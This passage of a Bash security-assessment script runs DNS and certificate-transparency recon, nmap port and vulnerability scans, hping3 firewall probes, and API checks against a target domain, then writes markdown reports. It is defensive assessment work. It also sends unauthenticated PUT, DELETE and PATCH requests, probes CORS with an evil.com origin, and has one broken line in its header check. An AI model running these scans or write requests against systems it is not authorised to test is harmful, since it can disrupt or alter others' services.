################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
log_info "Performing DNS reconnaissance..."
log_debug "Resolving domain: $DOMAIN"
# Resolve domain to IP
IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
if [ -z "$IP_ADDRESS" ]; then
log_error "Could not resolve domain: $DOMAIN"
log_debug "DNS resolution failed for $DOMAIN"
exit 1
fi
log_success "Resolved $DOMAIN to $IP_ADDRESS"
log_debug "Target IP address: $IP_ADDRESS"
# Get comprehensive DNS records
log_debug "Querying DNS records (ANY)..."
dig "$DOMAIN" ANY > dns_records.txt 2>&1
log_debug "Querying A records..."
dig "$DOMAIN" A > dns_a_records.txt 2>&1
log_debug "Querying MX records..."
dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
log_debug "Querying NS records..."
dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
log_debug "Querying TXT records..."
dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
# Reverse DNS lookup
log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
echo "$IP_ADDRESS" > ip_address.txt
log_debug "DNS reconnaissance complete"
}
################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
if [ "$SCAN_SUBDOMAINS" = false ]; then
log_info "Subdomain scanning disabled"
log_debug "Skipping subdomain discovery"
echo "0" > subdomain_count.txt
return
fi
log_info "Discovering subdomains via certificate transparency..."
log_debug "Querying crt.sh for subdomains of $DOMAIN"
log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
# Query crt.sh for subdomains
curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
jq -r '.[].name_value' | \
sed 's/\*\.//g' | \
sort -u | \
grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
log_debug "Subdomains saved to: subdomains_discovered.txt"
}
################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
log_info "Analyzing SSL/TLS configuration..."
log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
# Get certificate details
log_debug "Extracting certificate details..."
echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -text > certificate_details.txt 2>&1
# Extract key information
log_debug "Extracting certificate issuer..."
CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -issuer | sed 's/issuer=//')
log_debug "Extracting certificate subject..."
CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -subject | sed 's/subject=//')
log_debug "Extracting certificate dates..."
CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -dates)
echo "$CERT_ISSUER" > cert_issuer.txt
echo "$CERT_SUBJECT" > cert_subject.txt
echo "$CERT_DATES" > cert_dates.txt
log_debug "Certificate issuer: $CERT_ISSUER"
log_debug "Certificate subject: $CERT_SUBJECT"
# Enumerate SSL/TLS ciphers
log_info "Enumerating SSL/TLS ciphers..."
log_debug "Running nmap ssl-enum-ciphers script on port 443"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
else
nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
fi
# Check for TLS versions
log_debug "Analyzing TLS protocol versions..."
TLS_12=$(grep -c "TLSv1.2" ssl_ciphers.txt || echo "0")
TLS_13=$(grep -c "TLSv1.3" ssl_ciphers.txt || echo "0")
TLS_10=$(grep -c "TLSv1.0" ssl_ciphers.txt || echo "0")
TLS_11=$(grep -c "TLSv1.1" ssl_ciphers.txt || echo "0")
echo "TLSv1.0: $TLS_10" > tls_versions.txt
echo "TLSv1.1: $TLS_11" >> tls_versions.txt
echo "TLSv1.2: $TLS_12" >> tls_versions.txt
echo "TLSv1.3: $TLS_13" >> tls_versions.txt
log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
# Check for SSL vulnerabilities
log_info "Checking for SSL/TLS vulnerabilities..."
log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
else
nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
fi
log_success "SSL/TLS analysis complete"
}
################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
log_info "Performing comprehensive port scan..."
log_debug "Target IP: $IP_ADDRESS"
log_debug "Using network interface: $NETWORK_INTERFACE"
# Quick scan of top 1000 ports
log_info "Scanning top 1000 ports..."
log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
else
nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
fi
# Count open ports
OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt || echo "0")
echo "$OPEN_PORTS" > open_ports_count.txt
log_debug "Found $OPEN_PORTS open ports"
# Extract open ports list with versions
log_debug "Extracting open ports list with service information"
grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
# Detect service versions for old software
log_info "Detecting service versions..."
log_debug "Filtering service version information"
grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
log_success "Port scan complete: $OPEN_PORTS open ports found"
}
################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
if [ "$VULN_SCAN" = false ]; then
log_info "Vulnerability scanning disabled"
log_debug "Skipping vulnerability scanning"
return
fi
log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
log_debug "Target: $IP_ADDRESS"
log_debug "Using network interface: $NETWORK_INTERFACE"
# NMAP vulnerability scripts
log_info "Running NMAP vulnerability scripts..."
log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
else
nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
fi
VULN_PID=$!
log_debug "Vulnerability scan PID: $VULN_PID"
# Wait with progress indicator
log_debug "Waiting for vulnerability scan to complete..."
while kill -0 $VULN_PID 2>/dev/null; do
echo -n "."
sleep 5
done
echo
# Parse vulnerability results
if [ -f nmap_vuln_scan.txt ]; then
log_debug "Parsing vulnerability scan results"
grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt || echo "0")
echo "$VULN_COUNT" > vulnerability_count.txt
log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
fi
# Check for specific vulnerabilities
log_info "Checking for common HTTP vulnerabilities..."
log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
else
nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
fi
log_debug "HTTP vulnerability scan complete"
}
################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
if ! command -v hping3 >/dev/null 2>&1; then
log_warning "hping3 not installed, skipping firewall tests"
log_debug "hping3 command not found in PATH"
return
fi
log_info "Performing hping3 firewall tests..."
log_debug "Target: $IP_ADDRESS"
log_debug "Using network interface: $NETWORK_INTERFACE"
# TCP SYN scan
log_info "Testing TCP SYN response..."
log_debug "Sending 5 TCP SYN packets to port 80"
if [ -n "$NETWORK_INTERFACE" ]; then
timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
else
timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
fi
log_debug "TCP SYN test complete"
# TCP ACK scan (firewall detection)
log_info "Testing firewall with TCP ACK..."
log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
if [ -n "$NETWORK_INTERFACE" ]; then
timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
else
timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
fi
log_debug "TCP ACK test complete"
# ICMP test
log_info "Testing ICMP response..."
log_debug "Sending 5 ICMP echo requests"
if [ -n "$NETWORK_INTERFACE" ]; then
timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
else
timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
fi
log_debug "ICMP test complete"
log_success "hping3 tests complete"
}
################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
log_info "Performing detailed asset discovery..."
log_debug "Creating assets directory"
mkdir -p assets
# Web technology detection
log_info "Detecting web technologies..."
log_debug "Fetching HTTP headers from https://${DOMAIN}"
curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
log_debug "Web technologies saved to: assets/web_technologies.txt"
# Detect CMS
log_info "Detecting CMS and frameworks..."
log_debug "Analyzing page content for CMS signatures"
curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
log_debug "CMS detection complete"
# JavaScript libraries
log_info "Detecting JavaScript libraries..."
log_debug "Searching for common JavaScript libraries"
curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
# Check for common files
log_info "Checking for common files..."
log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
log_debug "Checking for: $file"
if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
echo "$file: Found" >> assets/common_files.txt
log_debug "Found: $file"
curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
fi
done
# Server fingerprinting
log_info "Fingerprinting server..."
log_debug "Running nmap HTTP server header and title scripts"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
else
nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
fi
log_success "Asset discovery complete"
}
################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
log_info "Detecting outdated software versions..."
log_debug "Creating old_software directory"
mkdir -p old_software
# Parse service versions from port scan
if [ -f service_versions.txt ]; then
log_debug "Analyzing service versions for outdated software"
# Check for old Apache versions
log_debug "Checking for old Apache versions..."
grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
# Check for old OpenSSH versions
log_debug "Checking for old OpenSSH versions..."
grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
# Check for old PHP versions
log_debug "Checking for old PHP versions..."
grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
# Check for old MySQL versions
log_debug "Checking for old MySQL versions..."
grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
# Check for old nginx versions
log_debug "Checking for old nginx versions..."
grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
fi
# Check SSL/TLS for old versions
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
log_debug "Outdated TLS protocols detected"
echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
fi
# Count old software findings
OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
log_debug "Outdated software details saved in old_software/ directory"
else
log_success "No obviously outdated software detected"
fi
}
################################################################################
# API Discovery
################################################################################
api_discovery() {
if [ "$API_SCAN" = false ]; then
log_info "API scanning disabled"
log_debug "Skipping API discovery"
return
fi
log_info "Discovering APIs..."
log_debug "Creating api_discovery directory"
mkdir -p api_discovery
# Common API paths
API_PATHS=(
"/api"
"/api/v1"
"/api/v2"
"/rest"
"/graphql"
"/swagger"
"/swagger.json"
"/api-docs"
"/openapi.json"
"/.well-known/openapi"
)
log_debug "Testing ${#API_PATHS[@]} common API endpoints"
for path in "${API_PATHS[@]}"; do
log_debug "Testing: $path"
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
if [ "$HTTP_CODE" != "404" ]; then
echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
fi
done
# Check for API documentation
log_info "Checking for API documentation..."
log_debug "Testing for Swagger UI and API docs"
curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
log_success "API discovery complete"
}
################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
if [ "$API_SCAN" = false ]; then
log_debug "API scanning disabled, skipping permission testing"
return
fi
log_info "Testing API permissions..."
log_debug "Creating api_permissions directory"
mkdir -p api_permissions
# Test common API endpoints without authentication
if [ -f api_discovery/endpoints_found.txt ]; then
log_debug "Testing discovered API endpoints for authentication issues"
while IFS= read -r endpoint; do
API_PATH=$(echo "$endpoint" | cut -d: -f1)
# Test GET without auth
log_info "Testing $API_PATH without authentication..."
log_debug "Sending unauthenticated GET request to $API_PATH"
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
log_debug "Response: HTTP $HTTP_CODE"
# Test common HTTP methods
log_debug "Testing HTTP methods on $API_PATH"
for method in GET POST PUT DELETE PATCH; do
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
fi
done
done < api_discovery/endpoints_found.txt
fi
# Check for CORS misconfigurations
log_info "Checking CORS configuration..."
log_debug "Testing CORS headers with evil.com origin"
curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
log_success "API permission testing complete"
}
################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
log_info "Analyzing HTTP security headers..."
log_debug "Fetching headers from https://${DOMAIN}"
# Get headers from main domain
curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
# Check for specific security headers
declare -A HEADERS=(
["x-frame-options"]="X-Frame-Options"
["x-content-type-options"]="X-Content-Type-Options"
["strict-transport-security"]="Strict-Transport-Security"
["content-security-policy"]="Content-Security-Policy"
["referrer-policy"]="Referrer-Policy"
["permissions-policy"]="Permissions-Policy"
["x-xss-protection"]="X-XSS-Protection"
)
log_debug "Checking for security headers"
> security_headers_status.txt
for header in "${!HEADERS[@]}"; do
if grep -qi "^${header}:" http_headers.txt; then
security_headers_status.txt
else
echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
fi
done
log_success "HTTP security headers analysis complete"
}
################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
log_debug "Subdomain scanning disabled or no subdomains discovered"
return
fi
log_info "Scanning discovered subdomains..."
log_debug "Creating subdomain_scans directory"
mkdir -p subdomain_scans
local count=0
while IFS= read -r subdomain; do
count=$((count + 1))
log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
log_debug "Testing accessibility of $subdomain"
# Quick check if subdomain is accessible
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
# Get headers
log_debug "Fetching headers from $subdomain"
curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
# Quick port check (top 100 ports)
log_debug "Scanning top 100 ports on $subdomain"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
else
nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
fi
# Check for old software
log_debug "Checking service versions on $subdomain"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
else
nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
fi
log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
else
log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
fi
done < subdomains_discovered.txt
log_success "Subdomain scanning complete"
}
################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
log_info "Generating executive summary..."
log_debug "Creating executive summary report"
cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report
**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE
---
## Overview
This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.
---
## Key Findings
### 1. Domain Information
- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)
### 2. SSL/TLS Configuration
**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`
**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`
**Assessment:**
EOF
# Add TLS assessment
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
else
echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 3. Port Exposure
- **Open Ports (Top 1000):** $(cat open_ports_count.txt)
**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`
### 4. Vulnerability Assessment
EOF
if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)
**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`
EOF
else
echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 5. Outdated Software
- **Outdated Components Found:** $(cat old_software_count.txt)
EOF
if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
echo "\`\`\`" >> "$EXEC_REPORT"
find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
echo "\`\`\`" >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 6. API Security
EOF
if [ "$API_SCAN" = true ]; then
if [ -f api_discovery/endpoints_found.txt ]; then
cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`
EOF
fi
if [ -f api_permissions/method_issues.txt ]; then
cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`
EOF
fi
else
echo "API scanning was not performed." >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 7. HTTP Security Headers
\`\`\`
$(cat security_headers_status.txt)
\`\`\`
---
## Priority Recommendations
### Immediate Actions (Priority 1)
EOF
# Add specific recommendations
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
fi
if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
fi
if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
fi
if grep -q "Missing" security_headers_status.txt; then
echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
fi
if [ -f api_permissions/method_issues.txt ]; then
echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### Review Actions (Priority 2)
1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures
---
## Next Steps
1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation
---
**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR
**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md
EOF
log_success "Executive summary generated: $EXEC_REPORT"
log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}
################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
log_info "Generating detailed technical report..."
log_debug "Creating technical report"
cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN
**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL
---
## 1. Scope
**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")
---
## 2. DNS Configuration
\`\`\`
$(cat dns_records.txt)
\`\`\`
---
## 3. SSL/TLS Configuration
\`\`\`
$(cat certificate_details.txt)
\`\`\`
---
## 4. Port Scan Results
\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`
---
## 5. Vulnerability Assessment
EOF
if [ "$VULN_SCAN" = true ]; then
cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan
\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`
### 5.2 HTTP Vulnerabilities
\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`
### 5.3 SSL/TLS Vulnerabilities
\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`
EOF
fi
cat >> "$TECH_REPORT" << EOF
---
## 6. Asset Discovery
### 6.1 Web Technologies
\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`
### 6.2 CMS Detection
\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`
### 6.3 JavaScript Libraries
\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`
### 6.4 Common Files
\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`
---
## 7. Outdated Software
EOF
if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
for file in old_software/*.txt; do
if [ -f "$file" ] && [ -s "$file" ]; then
echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
echo "\`\`\`" >> "$TECH_REPORT"
cat "$file" >> "$TECH_REPORT"
echo "\`\`\`" >> "$TECH_REPORT"
echo >> "$TECH_REPORT"
fi
done
else
echo "No outdated software detected." >> "$TECH_REPORT"
fi
cat >> "$TECH_REPORT" << EOF
---
## 8. API Security
EOF
if [ "$API_SCAN" = true ]; then
cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints
\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`
### 8.2 API Permissions
\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`
### 8.3 CORS Configuration
\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`
EOF
fi
cat >> "$TECH_REPORT" << EOF
---
## 9. HTTP Security Headers
\`\`\`
$(cat http_headers.txt)
\`\`\`
**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`
---
## 10. Recommendations
### 10.1 Immediate Actions
EOF
# Add recommendations
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
fi
if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
fi
if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
echo "3. Update outdated software components" >> "$TECH_REPORT"
fi
cat >> "$TECH_REPORT" << EOF
### 10.2 Review Actions
1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments
---
## 11. Document Control
**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)
---
**END OF TECHNICAL REPORT**
EOF
log_success "Technical report generated: $TECH_REPORT"
log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}
################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
if [ "$VULN_SCAN" = false ]; then
log_debug "Vulnerability scanning disabled, skipping vulnerability report"
return
fi
log_info "Generating vulnerability report..."
log_debug "Creating vulnerability report"
cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN
**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION
---
## Executive Summary
**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)
---
## 1. NMAP Vulnerability Scan
\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`
---
## 2. HTTP Vulnerabilities
\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`
---
## 3. SSL/TLS Vulnerabilities
\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`
---
## 4. Detailed Findings
\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`
---
**END OF VULNERABILITY REPORT**
EOF
log_success "Vulnerability report generated: $VULN_REPORT"
log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}
################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
if [ "$API_SCAN" = false ]; then
log_debug "API scanning disabled, skipping API report"
return
fi
log_info "Generating API security report..."
log_debug "Creating API security report"
cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN
**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION
---
## 1. API Discovery
### 1.1 Endpoints Found
\`\`\`
